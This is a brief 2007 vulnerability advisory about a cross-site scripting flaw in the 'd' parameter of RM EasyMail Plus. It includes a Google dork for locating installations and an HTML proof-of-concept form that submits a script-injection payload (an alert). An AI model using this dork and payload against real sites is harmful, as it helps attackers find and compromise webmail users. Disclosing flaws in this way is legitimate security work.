RM EasyMail Plus - Cross-Site Scripting Exploit

Monday, 21 May 2007

The variable 'd' (when used with POST and GET) is vulnerable to Cross-Site Scripting attacks.

Vulnerable: RM EasyMail Plus (other versions should also be vulnerable)
Google d0rk: intitle:"Powered by RM EasyMail Plus"

John Martinelli

RedLevel Security

May 6th, 2007


<head><title>RM EasyMail Plus - Cross-Site Scripting Exploit</title><body>

<center><br><br><font size=4>RM EasyMail Plus - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="">John Martinelli</a> of <a href="">RedLevel Security</a><br><br>Google d0rk: <a href="">intitle:"Powered by RM EasyMail Plus"</a></font><br>

<form action="" method="post">
<input type=hidden name="s" value="1">
<input name="d" size=75 value=">'><script>alert(1);</script>">
<input type=submit value="Execute XSS Attack" class="button">

Original article:

Share this content:
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.